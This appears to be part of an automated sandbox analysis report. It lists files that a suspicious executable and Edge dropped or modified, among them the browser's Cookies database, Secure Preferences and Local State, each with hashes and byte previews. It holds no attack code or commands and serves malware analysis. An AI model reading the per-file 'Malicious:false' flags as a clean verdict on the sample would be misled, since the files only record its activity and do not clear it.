                                                                                                                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:.

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\TmpUserData\BrowserMetrics\BrowserMetrics-677A3722-1EBC.pma

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):4194304
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.04648285425008554
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:192:rymi0jLYiVWK+sBhF4S5PJTpRlakC2GXnSgDWT3h/ZNExIdVg1RQcGy36En8y08s:Gt0jjlTX38Ihx1gr13b08T2RGOD
                                                                                                                                                                                                                                                                                                                            MD5:8060C7279BFCE613E73FC9E126C01E88
                                                                                                                                                                                                                                                                                                                            SHA1:E287C6D327C5A8AAB78729E9E25402EBF94C62C8
                                                                                                                                                                                                                                                                                                                            SHA-256:FCDF62AF29A934CA0A54901AB095A9A354211D4DFAF1C832A808AA88E36E65DF
                                                                                                                                                                                                                                                                                                                            SHA-512:2BA1B567355A90F78ED6286D44F65974413C0DD66C492B21A434CC2E2F86E654C8121156B0CC8B8B2DE18A27D5C87E1FA3DA0934B8E50B7AA2A9F442BC24506C
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:...@..@...@.....C.].....@................h...W..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30...............117.0.2045.55-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".rlyshm20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@....................................w..U..G...W6.....>.........."....."...24.."."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...Nb.X9.I@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2......._......

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\TmpUserData\Crashpad\throttle_store.dat

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):20
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.6219280948873624
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:8g6Vvn:8g6Vv
                                                                                                                                                                                                                                                                                                                            MD5:9E4E94633B73F4A7680240A0FFD6CD2C
                                                                                                                                                                                                                                                                                                                            SHA1:E68E02453CE22736169A56FDB59043D33668368F
                                                                                                                                                                                                                                                                                                                            SHA-256:41C91A9C93D76295746A149DCE7EBB3B9EE2CB551D84365FFF108E59A61CC304
                                                                                                                                                                                                                                                                                                                            SHA-512:193011A756B2368956C71A9A3AE8BC9537D99F52218F124B2E64545EEB5227861D372639052B74D0DD956CB33CA72A9107E069F1EF332B9645044849D14AF337
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:level=none expiry=0.

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Network\Cookies

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                                                                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                                                                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                                                                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                                                                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):30076
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.567669414159009
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:768:jf8BBgLoL6+vWPm0f4W8F1+UoAYDCx9Tuqh0VfUC9xbog/OVQmdXt4erw777:jf8BBOW6+vWPm0f4Wu1japmd94737
                                                                                                                                                                                                                                                                                                                            MD5:66E477495E30EE8AA013A8F513A77257
                                                                                                                                                                                                                                                                                                                            SHA1:605947E12458EDA239019A777A3FCB27D0C25978
                                                                                                                                                                                                                                                                                                                            SHA-256:7E688E6732F4E21CE5BA7B7F8518CA8D5D5C0D37559AC1F799E1DAC2973C2744
                                                                                                                                                                                                                                                                                                                            SHA-512:2CD827C48405F9A9B213819DA5FAF93FB43E5B54454CC5B811A706B40CB2D6E4F0658BCB9EA0C87A65013332ECB829C17B590DB9F8C896BFBDAE61706CF8F626
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13340960281132625","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13340960281132625","location":5,"ma

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\TmpUserData\Last Version (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):44455
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.089741747455916
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW6di1zNtPl4kzZ7okEt9r1JDSgzMMd6qD47u3+Ciol:+/Ps+wsI7ynOSkzItSmd6qE7lFol
                                                                                                                                                                                                                                                                                                                            MD5:984EB5B329CECFDD591DAFAC9780511F
                                                                                                                                                                                                                                                                                                                            SHA1:4D3AC368DFE387AE387828A0D330FD7F7B170501
                                                                                                                                                                                                                                                                                                                            SHA-256:490BC57549419F27F8E720B0C23E9D7DAD7E5A9C9FC23857293A42126668FA72
                                                                                                                                                                                                                                                                                                                            SHA-512:3361E0B7EED937BDE6F4462AB688B7B08CE2A1A26D05DBD20D912F303D6271C352AD1DEE09C37FBE35AA144AD5527700CFE0538AC1BDFF570EAE523F7E79C77D
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\TmpUserData\Local State

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):44455
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.089741747455916
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW6di1zNtPl4kzZ7okEt9r1JDSgzMMd6qD47u3+Ciol:+/Ps+wsI7ynOSkzItSmd6qE7lFol
                                                                                                                                                                                                                                                                                                                            MD5:984EB5B329CECFDD591DAFAC9780511F
                                                                                                                                                                                                                                                                                                                            SHA1:4D3AC368DFE387AE387828A0D330FD7F7B170501
                                                                                                                                                                                                                                                                                                                            SHA-256:490BC57549419F27F8E720B0C23E9D7DAD7E5A9C9FC23857293A42126668FA72
                                                                                                                                                                                                                                                                                                                            SHA-512:3361E0B7EED937BDE6F4462AB688B7B08CE2A1A26D05DBD20D912F303D6271C352AD1DEE09C37FBE35AA144AD5527700CFE0538AC1BDFF570EAE523F7E79C77D
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\TmpUserData\Local State~RF37437.TMP (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):44455
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.089741747455916
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW6di1zNtPl4kzZ7okEt9r1JDSgzMMd6qD47u3+Ciol:+/Ps+wsI7ynOSkzItSmd6qE7lFol
                                                                                                                                                                                                                                                                                                                            MD5:984EB5B329CECFDD591DAFAC9780511F
                                                                                                                                                                                                                                                                                                                            SHA1:4D3AC368DFE387AE387828A0D330FD7F7B170501
                                                                                                                                                                                                                                                                                                                            SHA-256:490BC57549419F27F8E720B0C23E9D7DAD7E5A9C9FC23857293A42126668FA72
                                                                                                                                                                                                                                                                                                                            SHA-512:3361E0B7EED937BDE6F4462AB688B7B08CE2A1A26D05DBD20D912F303D6271C352AD1DEE09C37FBE35AA144AD5527700CFE0538AC1BDFF570EAE523F7E79C77D
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\TmpUserData\Local State~RF374f2.TMP (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):44455
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.089741747455916
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW6di1zNtPl4kzZ7okEt9r1JDSgzMMd6qD47u3+Ciol:+/Ps+wsI7ynOSkzItSmd6qE7lFol
                                                                                                                                                                                                                                                                                                                            MD5:984EB5B329CECFDD591DAFAC9780511F
                                                                                                                                                                                                                                                                                                                            SHA1:4D3AC368DFE387AE387828A0D330FD7F7B170501
                                                                                                                                                                                                                                                                                                                            SHA-256:490BC57549419F27F8E720B0C23E9D7DAD7E5A9C9FC23857293A42126668FA72
                                                                                                                                                                                                                                                                                                                            SHA-512:3361E0B7EED937BDE6F4462AB688B7B08CE2A1A26D05DBD20D912F303D6271C352AD1DEE09C37FBE35AA144AD5527700CFE0538AC1BDFF570EAE523F7E79C77D
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\bhvD502.tmp

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                                                                                                                                                                                                                                                                                                                            File Type:Extensible storage user DataBase, version 0x620, checksum 0x5b3f3817, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):17301504
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.0235370233955554
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6144:TvQPYV7AyUO+xBGA611GJxBGA611Gv0M6JKX3XX35X3khTAvhTA/hTATX3t8nqks:4yUt3F0TkT0TAitKxK9JdIC4Ago
                                                                                                                                                                                                                                                                                                                            MD5:BC9039D26950B60BFE31D2E7B106C143
                                                                                                                                                                                                                                                                                                                            SHA1:368000881EAB6B7185DEB7C9321BB8E270B83CBC
                                                                                                                                                                                                                                                                                                                            SHA-256:CE49EC593F8FAC3B07BB07EC48105292372D522BF7A9042B045A96EB3D3BF72E
                                                                                                                                                                                                                                                                                                                            SHA-512:EA43DCE408D0B9737D0E27DA93E0878822FDC343C94A14FC887E5EBF4362D309AD721F7E39BDFEC45AF5CACCDD28FA8DB1BB4B767D37A74C9604F2A1DB003224
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:[?8.... .......4.........gN;....{........................&....../...{...'...}..h.(.........................T.;....{..............................................................................................Y...........eJ......n........................................................................................................... ........+...{o..............................................................................................................................................................................................!...{..................................3A/..'...}..................Tp4..'...}...........................#......h.(.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1658
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.413756297678275
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:Y4MfJVe5wMd5wMe07cIF5Io0MY5kU2A0OpJ5xnL0MotJ5VovUx0jE54t60jD5M:JIVuwEw5MUFZLBQLt7IBM
                                                                                                                                                                                                                                                                                                                            MD5:D2269B5F49C1C15238C9BBDF40149FB7
                                                                                                                                                                                                                                                                                                                            SHA1:214472ED991DA88BA2F240AD3A72517733E891C2
                                                                                                                                                                                                                                                                                                                            SHA-256:FC65BF768E1D98DA8CD23622C42451FB18B2735D14C5B0D442272EB20FF25316
                                                                                                                                                                                                                                                                                                                            SHA-512:51F8A4122075ED9514F34545F120129E64D4A8FC4650902B8A4C804472EFA85AC47DDBFEED1C9C6C1C68089C7B88EBE14056E3B434AA9CBCEF15958DE78AC531
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"logTime": "1005/061810", "correlationVector":"0kV+/vRB8ay0a3Cue7mk6o","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"AFo3IfjRT+3l4ojiXpMdNH","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"838E3BF9A44F456CB4AD62AC737EDD15","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063233", "correlationVector":"2N8fwTcZh6EtTfQ8o4+6aX","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063233", "correlationVector":"5ADEBA42608E4CC9A1FACA719F284CF9","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063346", "correlationVector":"xp/hBMCdVPtUIxZHIviv/x","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063347", "correlationVector":"BF0B9E58C0CC45ED9AB5D0371131E69A","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/064305", "correlationVector":"ONVjsWDap1LyjIRdxsqPGs","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/064305", "correlationVector":"82E52491

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\djdxhsukiioozpxia

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                                                                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:Qn:Qn
                                                                                                                                                                                                                                                                                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                                                                                                                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                                                                                                                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                                                                                                                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\eac6d874-e6d2-4fbc-8f73-8a235cc908ab.tmp

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):11185
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                                            MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                                            SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                                            SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                                            SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                                            Malicious:false
